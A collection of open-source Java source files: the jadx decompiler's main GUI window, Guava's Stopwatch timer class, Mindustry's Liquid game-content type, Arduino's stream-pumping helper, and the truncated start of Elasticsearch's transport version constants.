backAction.setEnabled(loaded);
backVariantAction.setEnabled(loaded);
forwardAction.setEnabled(loaded);
forwardVariantAction.setEnabled(loaded);
syncAction.setEnabled(loaded);
saveAllAction.setEnabled(loaded);
exportAction.setEnabled(loaded);
saveProjectAsAction.setEnabled(loaded);
reloadAction.setEnabled(loaded);
decompileAllAction.setEnabled(loaded);
deobfAction.setEnabled(loaded);
quarkAction.setEnabled(loaded);
resetCacheAction.setEnabled(loaded);
return false;
});
}
private void initUI() {
setMinimumSize(new Dimension(200, 150));
mainPanel = new JPanel(new BorderLayout());
treeSplitPane = new JSplitPane();
treeSplitPane.setResizeWeight(SPLIT_PANE_RESIZE_WEIGHT);
mainPanel.add(treeSplitPane);
DefaultMutableTreeNode treeRootNode = new DefaultMutableTreeNode(NLS.str("msg.open_file"));
treeModel = new DefaultTreeModel(treeRootNode);
tree = new JTree(treeModel);
ToolTipManager.sharedInstance().registerComponent(tree);
tree.getSelectionModel().setSelectionMode(TreeSelectionModel.SINGLE_TREE_SELECTION);
tree.setFocusable(false);
tree.addFocusListener(new FocusAdapter() {
@Override
public void focusLost(FocusEvent e) {
tree.setFocusable(false);
}
});
tree.addMouseListener(new MouseAdapter() {
@Override
public void mousePressed(MouseEvent e) {
if (SwingUtilities.isLeftMouseButton(e)) {
if (!nodeClickAction(getJNodeUnderMouse(e))) {
// click ignored -> switch to focusable mode
tree.setFocusable(true);
tree.requestFocus();
}
} else if (SwingUtilities.isRightMouseButton(e)) {
treeRightClickAction(e);
}
}
});
tree.addKeyListener(new KeyAdapter() {
@Override
public void keyPressed(KeyEvent e) {
if (e.getKeyCode() == KeyEvent.VK_ENTER) {
nodeClickAction(tree.getLastSelectedPathComponent());
}
}
});
tree.setCellRenderer(new DefaultTreeCellRenderer() {
@Override
public Component getTreeCellRendererComponent(JTree tree,
Object value, boolean selected, boolean expanded,
boolean isLeaf, int row, boolean focused) {
Component c = super.getTreeCellRendererComponent(tree, value, selected, expanded, isLeaf, row, focused);
if (value instanceof JNode) {
JNode jNode = (JNode) value;
NodeLabel.disableHtml(this, jNode.disableHtml());
setText(jNode.makeStringHtml());
setIcon(jNode.getIcon());
setToolTipText(jNode.getTooltip());
} else {
setToolTipText(null);
}
if (value instanceof JPackage) {
setEnabled(((JPackage) value).isEnabled());
}
return c;
}
});
tree.addTreeWillExpandListener(new TreeWillExpandListener() {
@Override
public void treeWillExpand(TreeExpansionEvent event) {
TreePath path = event.getPath();
Object node = path.getLastPathComponent();
if (node instanceof JLoadableNode) {
((JLoadableNode) node).loadNode();
}
if (!treeReloading) {
project.addTreeExpansion(getPathExpansion(event.getPath()));
update();
}
}
@Override
public void treeWillCollapse(TreeExpansionEvent event) {
if (!treeReloading) {
project.removeTreeExpansion(getPathExpansion(event.getPath()));
update();
}
}
});
progressPane = new ProgressPanel(this, true);
issuesPanel = new IssuesPanel(this);
JPanel leftPane = new JPanel(new BorderLayout());
JScrollPane treeScrollPane = new JScrollPane(tree);
treeScrollPane.setMinimumSize(new Dimension(100, 150));
JPanel bottomPane = new JPanel(new BorderLayout());
bottomPane.add(issuesPanel, BorderLayout.PAGE_START);
bottomPane.add(progressPane, BorderLayout.PAGE_END);
leftPane.add(treeScrollPane, BorderLayout.CENTER);
leftPane.add(bottomPane, BorderLayout.PAGE_END);
treeSplitPane.setLeftComponent(leftPane);
tabbedPane = new TabbedPane(this);
tabbedPane.setMinimumSize(new Dimension(150, 150));
new TabDndController(tabbedPane, settings);
rightSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
rightSplitPane.setTopComponent(tabbedPane);
rightSplitPane.setResizeWeight(SPLIT_PANE_RESIZE_WEIGHT);
treeSplitPane.setRightComponent(rightSplitPane);
new DropTarget(this, DnDConstants.ACTION_COPY, new MainDropTarget(this));
heapUsageBar = new HeapUsageBar();
mainPanel.add(heapUsageBar, BorderLayout.SOUTH);
bottomSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
bottomSplitPane.setTopComponent(treeSplitPane);
bottomSplitPane.setResizeWeight(SPLIT_PANE_RESIZE_WEIGHT);
mainPanel.add(bottomSplitPane, BorderLayout.CENTER);
setContentPane(mainPanel);
setTitle(DEFAULT_TITLE);
}
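/** Collects the names of the nodes along the given path (full class name for classes, toString() otherwise), ordered from the leaf up to the root. */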
private static String[] getPathExpansion(TreePath path) {
List<String> pathList = new ArrayList<>();
while (path != null) {
Object node = path.getLastPathComponent();
String name;
if (node instanceof JClass) {
name = ((JClass) node).getCls().getClassNode().getClassInfo().getFullName();
} else {
name = node.toString();
}
pathList.add(name);
path = path.getParentPath();
}
return pathList.toArray(new String[0]);
}
public static void getExpandedPaths(JTree tree, TreePath path, List<TreePath> list) {
if (tree.isExpanded(path)) {
list.add(path);
TreeNode node = (TreeNode) path.getLastPathComponent();
for (int i = node.getChildCount() - 1; i >= 0; i--) {
TreeNode n = node.getChildAt(i);
TreePath child = path.pathByAddingChild(n);
getExpandedPaths(tree, child, list);
}
}
}
public void setLocationAndPosition() {
if (settings.loadWindowPos(this)) {
return;
}
GraphicsDevice gd = GraphicsEnvironment.getLocalGraphicsEnvironment().getDefaultScreenDevice();
DisplayMode mode = gd.getDisplayMode();
AffineTransform trans = gd.getDefaultConfiguration().getDefaultTransform();
int w = (int) (mode.getWidth() / trans.getScaleX());
int h = (int) (mode.getHeight() / trans.getScaleY());
setBounds((int) (w * BORDER_RATIO), (int) (h * BORDER_RATIO),
(int) (w * WINDOW_RATIO), (int) (h * WINDOW_RATIO));
setLocationRelativeTo(null);
}
private void setEditorTheme(String editorThemePath) {
try {
URL themeUrl = getClass().getResource(editorThemePath);
if (themeUrl != null) {
try (InputStream is = themeUrl.openStream()) {
editorTheme = Theme.load(is);
return;
}
}
Path themePath = Paths.get(editorThemePath);
if (Files.isRegularFile(themePath)) {
try (InputStream is = Files.newInputStream(themePath)) {
editorTheme = Theme.load(is);
return;
}
}
} catch (Exception e) {
LOG.error("Failed to load editor theme: {}", editorThemePath, e);
}
LOG.warn("Falling back to default editor theme: {}", editorThemePath);
editorThemePath = EditorTheme.getDefaultTheme().getPath();
try (InputStream is = getClass().getResourceAsStream(editorThemePath)) {
editorTheme = Theme.load(is);
return;
} catch (Exception e) {
LOG.error("Failed to load default editor theme: {}", editorThemePath, e);
editorTheme = new Theme(new RSyntaxTextArea());
}
}
public Theme getEditorTheme() {
return editorTheme;
}
private void openSettings() {
settingsOpen = true;
JDialog settingsWindow = new JadxSettingsWindow(MainWindow.this, settings);
settingsWindow.setVisible(true);
settingsWindow.addWindowListener(new WindowAdapter() {
@Override
public void windowClosed(WindowEvent e) {
settingsOpen = false;
}
});
}
public boolean isSettingsOpen() {
return settingsOpen;
}
public void loadSettings() {
// queue update to not interrupt current UI tasks
UiUtils.uiRun(this::updateUiSettings);
}
private void updateUiSettings() {
LafManager.updateLaf(settings);
Font font = settings.getFont();
Font largerFont = font.deriveFont(font.getSize() + 2.f);
setFont(largerFont);
setEditorTheme(settings.getEditorThemePath());
tree.setFont(largerFont);
tree.setRowHeight(-1);
tabbedPane.loadSettings();
if (logPanel != null) {
logPanel.loadSettings();
}
shortcutsController.loadSettings();
}
private void closeWindow() {
saveAll();
if (!ensureProjectIsSaved()) {
return;
}
settings.setTreeWidth(treeSplitPane.getDividerLocation());
settings.saveWindowPos(this);
settings.setMainWindowExtendedState(getExtendedState());
if (debuggerPanel != null) {
saveSplittersInfo();
}
heapUsageBar.reset();
closeAll();
FileUtils.deleteTempRootDir();
dispose();
System.exit(0);
}
private void saveOpenTabs() {
project.saveOpenTabs(tabbedPane.getEditorViewStates());
}
private void restoreOpenTabs(List<EditorViewState> openTabs) {
UiUtils.uiThreadGuard();
if (openTabs.isEmpty()) {
return;
}
for (EditorViewState viewState : openTabs) {
tabbedPane.restoreEditorViewState(viewState);
}
}
private void preLoadOpenTabs(List<EditorViewState> openTabs) {
UiUtils.notUiThreadGuard();
for (EditorViewState tabState : openTabs) {
JNode node = tabState.getNode();
try {
node.getCodeInfo();
} catch (Exception e) {
LOG.warn("Failed to preload code for node: {}", node, e);
}
}
}
private void saveSplittersInfo() {
settings.setMainWindowVerticalSplitterLoc(bottomSplitPane.getDividerLocation());
if (debuggerPanel != null) {
settings.setDebuggerStackFrameSplitterLoc(debuggerPanel.getLeftSplitterLocation());
settings.setDebuggerVarTreeSplitterLoc(debuggerPanel.getRightSplitterLocation());
}
}
public void addLoadListener(ILoadListener loadListener) {
this.loadListeners.add(loadListener);
// set initial value
loadListener.update(loaded);
}
public void notifyLoadListeners(boolean loaded) {
this.loaded = loaded;
loadListeners.removeIf(listener -> listener.update(loaded));
}
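// Example of the listener contract (illustrative sketch; 'runOnceAfterLoad' is a hypothetical
// action, not part of this class): a listener whose update() returns true is removed, so
// one-shot actions can self-unregister after the first successful load.
//
// addLoadListener(loaded -> {
//     if (loaded) {
//         runOnceAfterLoad();
//         return true; // returning true removes this listener
//     }
//     return false; // keep listening for further load state changes
// });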
public void addTreeUpdateListener(Consumer<JRoot> listener) {
treeUpdateListener.add(listener);
}
public JadxWrapper getWrapper() {
return wrapper;
}
public JadxProject getProject() {
return project;
}
public TabbedPane getTabbedPane() {
return tabbedPane;
}
public JadxSettings getSettings() {
return settings;
}
public CacheObject getCacheObject() {
return cacheObject;
}
public BackgroundExecutor getBackgroundExecutor() {
return backgroundExecutor;
}
public JRoot getTreeRoot() {
return treeRoot;
}
public JDebuggerPanel getDebuggerPanel() {
initDebuggerPanel();
return debuggerPanel;
}
public ShortcutsController getShortcutsController() {
return shortcutsController;
}
public void showDebuggerPanel() {
initDebuggerPanel();
}
public void destroyDebuggerPanel() {
saveSplittersInfo();
if (debuggerPanel != null) {
debuggerPanel.setVisible(false);
debuggerPanel = null;
}
}
public void showHeapUsageBar() {
settings.setShowHeapUsageBar(true);
heapUsageBar.setVisible(true);
}
private void initDebuggerPanel() {
if (debuggerPanel == null) {
debuggerPanel = new JDebuggerPanel(this);
debuggerPanel.loadSettings();
bottomSplitPane.setBottomComponent(debuggerPanel);
int loc = settings.getMainWindowVerticalSplitterLoc();
if (loc == 0) {
loc = 300;
}
bottomSplitPane.setDividerLocation(loc);
}
}
public void showLogViewer(LogOptions logOptions) {
UiUtils.uiRun(() -> {
if (settings.isDockLogViewer()) {
showDockedLog(logOptions);
} else {
LogViewerDialog.open(this, logOptions);
}
});
}
private void showDockedLog(LogOptions logOptions) {
if (logPanel != null) {
logPanel.applyLogOptions(logOptions);
return;
}
Runnable undock = () -> {
hideDockedLog();
settings.setDockLogViewer(false);
LogViewerDialog.open(this, logOptions);
};
logPanel = new LogPanel(this, logOptions, undock, this::hideDockedLog);
rightSplitPane.setBottomComponent(logPanel);
}
private void hideDockedLog() {
if (logPanel == null) {
return;
}
logPanel.dispose();
logPanel = null;
rightSplitPane.setBottomComponent(null);
}
public JMenu getPluginsMenu() {
return pluginsMenu;
}
public void resetPluginsMenu() {
pluginsMenu.removeAll();
pluginsMenu.add(new ActionHandler(() -> new PluginSettings(this, settings).addPlugin())
.withNameAndDesc(NLS.str("preferences.plugins.install")));
}
public void addToPluginsMenu(Action item) {
if (pluginsMenu.getMenuComponentCount() == 1) {
pluginsMenu.addSeparator();
}
pluginsMenu.add(item);
}
public RenameMappingsGui getRenameMappings() {
return renameMappings;
}
public CacheManager getCacheManager() {
return cacheManager;
}
/**
* Fallback events instance used when the decompiler is not yet available
*/
private final IJadxEvents fallbackEvents = new JadxEventsImpl();
public IJadxEvents events() {
return wrapper.getCurrentDecompiler()
.map(JadxDecompiler::events)
.orElse(fallbackEvents);
}
}
| skylot/jadx | jadx-gui/src/main/java/jadx/gui/ui/MainWindow.java |
1,018 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.base;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkState;
import static java.util.concurrent.TimeUnit.DAYS;
import static java.util.concurrent.TimeUnit.HOURS;
import static java.util.concurrent.TimeUnit.MICROSECONDS;
import static java.util.concurrent.TimeUnit.MILLISECONDS;
import static java.util.concurrent.TimeUnit.MINUTES;
import static java.util.concurrent.TimeUnit.NANOSECONDS;
import static java.util.concurrent.TimeUnit.SECONDS;
import com.google.common.annotations.GwtCompatible;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.util.concurrent.TimeUnit;
/**
* An object that accurately measures <i>elapsed time</i>: the measured duration between two
* successive readings of "now" in the same process.
*
* <p>In contrast, <i>wall time</i> is a reading of "now" as given by a method like
* {@link System#currentTimeMillis()}, best represented as an {@link java.time.Instant}. Such values
* <i>can</i> be subtracted to obtain a {@code Duration} (such as by {@code Duration.between}), but
* doing so does <i>not</i> give a reliable measurement of elapsed time, because wall time readings
* are inherently approximate, routinely affected by periodic clock corrections. Because this class
* (by default) uses {@link System#nanoTime}, it is unaffected by these changes.
*
* <p>Use this class instead of direct calls to {@link System#nanoTime} for two reasons:
*
* <ul>
* <li>The raw {@code long} values returned by {@code nanoTime} are meaningless and unsafe to use
* in any other way than how {@code Stopwatch} uses them.
* <li>An alternative source of nanosecond ticks can be substituted, for example for testing or
* performance reasons, without affecting most of your code.
* </ul>
*
* <p>The one downside of {@code Stopwatch} relative to {@link System#nanoTime()} is that {@code
* Stopwatch} requires object allocation and additional method calls, which can reduce the accuracy
* of the elapsed times reported. {@code Stopwatch} is still suitable for logging and metrics where
* reasonably accurate values are sufficient. In the uncommon case that you need to maximize
* accuracy, use {@code System.nanoTime()} directly instead.
*
* <p>Basic usage:
*
* <pre>{@code
* Stopwatch stopwatch = Stopwatch.createStarted();
* doSomething();
* stopwatch.stop(); // optional
*
* long millis = stopwatch.elapsed(MILLISECONDS);
*
* log.info("time: " + stopwatch); // formatted string like "12.3 ms"
* }</pre>
*
* <p>The state-changing methods are not idempotent; it is an error to start or stop a stopwatch
* that is already in the desired state.
*
* <p>When testing code that uses this class, use {@link #createUnstarted(Ticker)} or {@link
* #createStarted(Ticker)} to supply a fake or mock ticker. This allows you to simulate any valid
* behavior of the stopwatch.
*
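* <p>For example, a test might drive the stopwatch from a manually advanced ticker (a minimal
* sketch; the {@code fakeNanos} holder is illustrative and not part of this library):
*
* <pre>{@code
* long[] fakeNanos = {0};
* Stopwatch stopwatch =
*     Stopwatch.createStarted(
*         new Ticker() {
*           public long read() {
*             return fakeNanos[0];
*           }
*         });
* fakeNanos[0] += MILLISECONDS.toNanos(10); // pretend 10 ms have passed
* long elapsed = stopwatch.elapsed(MILLISECONDS); // returns 10
* }</pre>
*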
* <p><b>Note:</b> This class is not thread-safe.
*
* <p><b>Warning for Android users:</b> a stopwatch with default behavior may not continue to keep
* time while the device is asleep. Instead, create one like this:
*
* <pre>{@code
* Stopwatch.createStarted(
* new Ticker() {
* public long read() {
* return android.os.SystemClock.elapsedRealtimeNanos(); // requires API Level 17
* }
* });
* }</pre>
*
* @author Kevin Bourrillion
* @since 10.0
*/
@GwtCompatible(emulated = true)
@SuppressWarnings("GoodTime") // lots of violations
@ElementTypesAreNonnullByDefault
public final class Stopwatch {
private final Ticker ticker;
private boolean isRunning;
private long elapsedNanos;
private long startTick;
/**
* Creates (but does not start) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted() {
return new Stopwatch();
}
/**
* Creates (but does not start) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted(Ticker ticker) {
return new Stopwatch(ticker);
}
/**
* Creates (and starts) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createStarted() {
return new Stopwatch().start();
}
/**
* Creates (and starts) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createStarted(Ticker ticker) {
return new Stopwatch(ticker).start();
}
Stopwatch() {
this.ticker = Ticker.systemTicker();
}
Stopwatch(Ticker ticker) {
this.ticker = checkNotNull(ticker, "ticker");
}
/**
* Returns {@code true} if {@link #start()} has been called on this stopwatch, and {@link #stop()}
* has not been called since the last call to {@code start()}.
*/
public boolean isRunning() {
return isRunning;
}
/**
* Starts the stopwatch.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already running.
*/
@CanIgnoreReturnValue
public Stopwatch start() {
checkState(!isRunning, "This stopwatch is already running.");
isRunning = true;
startTick = ticker.read();
return this;
}
/**
* Stops the stopwatch. Future reads will return the fixed duration that had elapsed up to this
* point.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already stopped.
*/
@CanIgnoreReturnValue
public Stopwatch stop() {
long tick = ticker.read();
checkState(isRunning, "This stopwatch is already stopped.");
isRunning = false;
elapsedNanos += tick - startTick;
return this;
}
/**
* Sets the elapsed time for this stopwatch to zero, and places it in a stopped state.
*
* @return this {@code Stopwatch} instance
*/
@CanIgnoreReturnValue
public Stopwatch reset() {
elapsedNanos = 0;
isRunning = false;
return this;
}
private long elapsedNanos() {
return isRunning ? ticker.read() - startTick + elapsedNanos : elapsedNanos;
}
/**
* Returns the current elapsed time shown on this stopwatch, expressed in the desired time unit,
* with any fraction rounded down.
*
* <p>Note that the overhead of measurement can be more than a microsecond, so it is generally not
* useful to specify {@link TimeUnit#NANOSECONDS} precision here.
*
* @since 14.0 (since 10.0 as {@code elapsedTime()})
*/
public long elapsed(TimeUnit desiredUnit) {
return desiredUnit.convert(elapsedNanos(), NANOSECONDS);
}
/** Returns a string representation of the current elapsed time. */
@Override
public String toString() {
long nanos = elapsedNanos();
TimeUnit unit = chooseUnit(nanos);
double value = (double) nanos / NANOSECONDS.convert(1, unit);
// Too bad this functionality is not exposed as a regular method call
return Platform.formatCompact4Digits(value) + " " + abbreviate(unit);
}
private static TimeUnit chooseUnit(long nanos) {
if (DAYS.convert(nanos, NANOSECONDS) > 0) {
return DAYS;
}
if (HOURS.convert(nanos, NANOSECONDS) > 0) {
return HOURS;
}
if (MINUTES.convert(nanos, NANOSECONDS) > 0) {
return MINUTES;
}
if (SECONDS.convert(nanos, NANOSECONDS) > 0) {
return SECONDS;
}
if (MILLISECONDS.convert(nanos, NANOSECONDS) > 0) {
return MILLISECONDS;
}
if (MICROSECONDS.convert(nanos, NANOSECONDS) > 0) {
return MICROSECONDS;
}
return NANOSECONDS;
}
private static String abbreviate(TimeUnit unit) {
switch (unit) {
case NANOSECONDS:
return "ns";
case MICROSECONDS:
return "\u03bcs"; // μs
case MILLISECONDS:
return "ms";
case SECONDS:
return "s";
case MINUTES:
return "min";
case HOURS:
return "h";
case DAYS:
return "d";
default:
throw new AssertionError();
}
}
}
| google/guava | android/guava/src/com/google/common/base/Stopwatch.java |
1,019 | package mindustry.type;
import arc.graphics.*;
import arc.graphics.g2d.*;
import arc.math.*;
import arc.struct.*;
import arc.util.*;
import mindustry.content.*;
import mindustry.ctype.*;
import mindustry.entities.*;
import mindustry.gen.*;
import mindustry.graphics.*;
import mindustry.logic.*;
import mindustry.world.*;
import mindustry.world.meta.*;
import static mindustry.entities.Puddles.*;
/** A better name for this class would be "fluid", but it's too late for that. */
public class Liquid extends UnlockableContent implements Senseable{
//must be static and global so conduits don't conflict - DO NOT INTERACT WITH THESE IN MODS OR I WILL PERSONALLY YELL AT YOU
public static final int animationFrames = 50;
public static float animationScaleGas = 190f, animationScaleLiquid = 230f;
protected static final Rand rand = new Rand();
/** If true, this fluid is treated as a gas (and does not create puddles) */
public boolean gas = false;
/** Color used in pipes and on the ground. */
public Color color;
/** Color of this liquid in gas form. */
public Color gasColor = Color.lightGray.cpy();
/** Color used in bars. */
public @Nullable Color barColor;
/** Color used to draw lights. Note that the alpha channel is used to dictate brightness. */
public Color lightColor = Color.clear.cpy();
/** 0-1, 0 is completely not flammable, anything above that may catch fire when exposed to heat, 0.5+ is very flammable. */
public float flammability;
/** temperature: 0.5 is 'room' temperature, 0 is very cold, 1 is molten hot */
public float temperature = 0.5f;
/** how much heat this liquid can store. 0.4=water (decent), anything lower is probably less dense and bad at cooling. */
public float heatCapacity = 0.5f;
/** how thick this liquid is. 0.5=water (relatively viscous), 1 would be something like tar (very slow). */
public float viscosity = 0.5f;
/** how prone to exploding this liquid is, when heated. 0 = nothing, 1 = nuke */
public float explosiveness;
/** whether this fluid reacts in blocks at all (e.g. slag with water) */
public boolean blockReactive = true;
/** if false, this liquid cannot be a coolant */
public boolean coolant = true;
/** if true, this liquid can move through blocks as a puddle. */
public boolean moveThroughBlocks = false;
/** if true, this liquid can be incinerated in the incinerator block. */
public boolean incinerable = true;
/** The associated status effect. */
public StatusEffect effect = StatusEffects.none;
/** Effect shown in puddles. */
public Effect particleEffect = Fx.none;
/** Particle effect rate spacing in ticks. */
public float particleSpacing = 60f;
/** Temperature at which this liquid vaporizes. This isn't just boiling. */
public float boilPoint = 2f;
/** If true, puddle size is capped. */
public boolean capPuddles = true;
/** Effect when this liquid vaporizes. */
public Effect vaporEffect = Fx.vapor;
/** If true, this liquid is hidden in most UI. */
public boolean hidden;
/** Liquids this puddle can stay on, e.g. oil on water. */
public ObjectSet<Liquid> canStayOn = new ObjectSet<>();
public Liquid(String name, Color color){
super(name);
this.color = new Color(color);
}
/** For modding only. */
public Liquid(String name){
this(name, new Color(Color.black));
}
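/*
 * Example of defining a custom fluid using the fields documented above (illustrative sketch;
 * "slime" is a made-up content name, not part of the game):
 *
 *   Liquid slime = new Liquid("slime", Color.lightGray.cpy());
 *   slime.viscosity = 0.9f;    // flows slowly, close to tar
 *   slime.flammability = 0f;   // will not catch fire
 *   slime.temperature = 0.4f;  // slightly below 'room' temperature
 *   slime.heatCapacity = 0.3f; // stores little heat, a poor coolant
 */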
@Override
public void init(){
super.init();
if(gas){
//always "boils", it's a gas
boilPoint = -1;
//ensure no accidental global mutation
color = color.cpy();
//all gases are transparent
color.a = 0.6f;
//for gases, gas color is implicitly their color
gasColor = color;
if(barColor == null){
barColor = color.cpy().a(1f);
}
}
}
@Override
public boolean isHidden(){
return hidden;
}
public int getAnimationFrame(){
return (int)(Time.time / (gas ? animationScaleGas : animationScaleLiquid) * animationFrames + id*5) % animationFrames;
}
/** @return true if this liquid will boil in this global environment. */
public boolean willBoil(){
return Attribute.heat.env() >= boilPoint;
}
public boolean canExtinguish(){
return flammability < 0.1f && temperature <= 0.5f;
}
public Color barColor(){
return barColor == null ? color : barColor;
}
/** Draws a puddle of this liquid on the floor. */
public void drawPuddle(Puddle puddle){
float amount = puddle.amount, x = puddle.x, y = puddle.y;
float f = Mathf.clamp(amount / (maxLiquid / 1.5f));
float smag = puddle.tile.floor().isLiquid ? 0.8f : 0f, sscl = 25f;
Draw.color(Tmp.c1.set(color).shiftValue(-0.05f));
Fill.circle(x + Mathf.sin(Time.time + id * 532, sscl, smag), y + Mathf.sin(Time.time + id * 53, sscl, smag), f * 8f);
float length = f * 6f;
rand.setSeed(id);
for(int i = 0; i < 3; i++){
Tmp.v1.trns(rand.random(360f), rand.random(length));
float vx = x + Tmp.v1.x, vy = y + Tmp.v1.y;
Fill.circle(
vx + Mathf.sin(Time.time + i * 532, sscl, smag),
vy + Mathf.sin(Time.time + i * 53, sscl, smag),
f * 5f);
}
Draw.color();
if(lightColor.a > 0.001f && f > 0){
Drawf.light(x, y, 30f * f, lightColor, color.a * f * 0.8f);
}
}
/** Runs when puddles update. */
public void update(Puddle puddle){
}
//TODO proper API for this (do not use yet!)
public float react(Liquid other, float amount, Tile tile, float x, float y){
return 0f;
}
@Override
public void setStats(){
stats.addPercent(Stat.explosiveness, explosiveness);
stats.addPercent(Stat.flammability, flammability);
stats.addPercent(Stat.temperature, temperature);
stats.addPercent(Stat.heatCapacity, heatCapacity);
stats.addPercent(Stat.viscosity, viscosity);
}
@Override
public double sense(LAccess sensor){
if(sensor == LAccess.color) return color.toDoubleBits();
if(sensor == LAccess.id) return getLogicId();
return Double.NaN;
}
@Override
public Object senseObject(LAccess sensor){
if(sensor == LAccess.name) return name;
return noSensed;
}
@Override
public String toString(){
return localizedName;
}
@Override
public ContentType getContentType(){
return ContentType.liquid;
}
}
| Anuken/Mindustry | core/src/mindustry/type/Liquid.java |
1,022 | /*
* This file is part of Arduino.
*
* Copyright 2015 Arduino LLC (http://www.arduino.cc/)
*
* Arduino is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* As a special exception, you may use this file as part of a free software
* library without restriction. Specifically, if other files instantiate
* templates or use macros or inline functions from this file, or you compile
* this file and link it with other files to produce an executable, this
* file does not by itself cause the resulting executable to be covered by
* the GNU General Public License. This exception does not however
* invalidate any other reasons why the executable file might be covered by
* the GNU General Public License.
*/
package cc.arduino;
import processing.app.debug.MessageConsumer;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
/**
* A version of StreamPumper from commons-exec that writes to a MessageConsumer
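*
* <p>Typical usage (illustrative sketch; {@code process} and {@code console} are placeholder
* names, not part of this class): run the pumper on its own thread, then wait until the stream
* has been fully drained. Note that {@link #waitFor()} declares {@link InterruptedException}.
*
* <pre>
*   MyStreamPumper pumper = new MyStreamPumper(process.getInputStream(), console);
*   new Thread(pumper).start();
*   // ... let the external process run ...
*   pumper.waitFor();
* </pre>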
*/
public class MyStreamPumper implements Runnable {
/**
* the input stream to pump from
*/
private final BufferedReader reader;
/**
* the message consumer to pump each line into
*/
private final MessageConsumer messageConsumer;
/**
* was the end of the stream reached
*/
private boolean finished;
public MyStreamPumper(final InputStream is, final MessageConsumer messageConsumer) {
this.reader = new BufferedReader(new InputStreamReader(is));
this.messageConsumer = messageConsumer;
}
/**
* Copies lines from the input stream to the message consumer. Terminates as
* soon as the input stream is closed or an error occurs.
*/
@Override
public void run() {
synchronized (this) {
// Just in case this object is reused in the future
finished = false;
}
try {
String line;
while ((line = reader.readLine()) != null) {
messageConsumer.message(line);
}
} catch (Exception e) {
// nothing to do - happens quite often with watchdog
} finally {
synchronized (this) {
finished = true;
notifyAll();
}
}
}
/**
* Tells whether the end of the stream has been reached.
*
* @return true if the stream has been exhausted.
*/
public synchronized boolean isFinished() {
return finished;
}
/**
* This method blocks until the stream pumper finishes.
*
* @see #isFinished()
*/
public synchronized void waitFor() throws InterruptedException {
while (!isFinished()) {
wait();
}
}
}
| roboard/86Duino | arduino-core/src/cc/arduino/MyStreamPumper.java |
1,023 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch;
import org.elasticsearch.core.Assertions;
import org.elasticsearch.core.UpdateForV9;
import java.lang.reflect.Field;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import java.util.NavigableMap;
import java.util.Set;
import java.util.TreeMap;
import java.util.TreeSet;
import java.util.function.IntFunction;
/**
* <p>Transport version is used to coordinate compatible wire protocol communication between nodes, at a fine-grained level. This replaces
* and supersedes the old Version constants.</p>
*
* <p>Before adding a new version constant, please read the block comment at the end of the list of constants.</p>
*/
public class TransportVersions {
/*
* NOTE: IntelliJ lies!
* This set is used during class construction, referenced by the def method.
* When all the transport version constants have been registered, the set is cleared & never touched again.
*/
static TreeSet<Integer> IDS = new TreeSet<>();
static TransportVersion def(int id) {
if (IDS == null) throw new IllegalStateException("The IDS map needs to be present to call this method");
if (IDS.add(id) == false) {
throw new IllegalArgumentException("Version id " + id + " defined twice");
}
if (id < IDS.last()) {
throw new IllegalArgumentException("Version id " + id + " is not defined in the right location. Keep constants sorted");
}
return new TransportVersion(id);
}
@UpdateForV9 // remove the transport versions with which v9 will not need to interact
public static final TransportVersion ZERO = def(0);
public static final TransportVersion V_7_0_0 = def(7_00_00_99);
public static final TransportVersion V_7_0_1 = def(7_00_01_99);
public static final TransportVersion V_7_1_0 = def(7_01_00_99);
public static final TransportVersion V_7_2_0 = def(7_02_00_99);
public static final TransportVersion V_7_2_1 = def(7_02_01_99);
public static final TransportVersion V_7_3_0 = def(7_03_00_99);
public static final TransportVersion V_7_3_2 = def(7_03_02_99);
public static final TransportVersion V_7_4_0 = def(7_04_00_99);
public static final TransportVersion V_7_5_0 = def(7_05_00_99);
public static final TransportVersion V_7_6_0 = def(7_06_00_99);
public static final TransportVersion V_7_7_0 = def(7_07_00_99);
public static final TransportVersion V_7_8_0 = def(7_08_00_99);
public static final TransportVersion V_7_8_1 = def(7_08_01_99);
public static final TransportVersion V_7_9_0 = def(7_09_00_99);
public static final TransportVersion V_7_10_0 = def(7_10_00_99);
public static final TransportVersion V_7_10_1 = def(7_10_01_99);
public static final TransportVersion V_7_11_0 = def(7_11_00_99);
public static final TransportVersion V_7_12_0 = def(7_12_00_99);
public static final TransportVersion V_7_13_0 = def(7_13_00_99);
public static final TransportVersion V_7_14_0 = def(7_14_00_99);
public static final TransportVersion V_7_15_0 = def(7_15_00_99);
public static final TransportVersion V_7_15_1 = def(7_15_01_99);
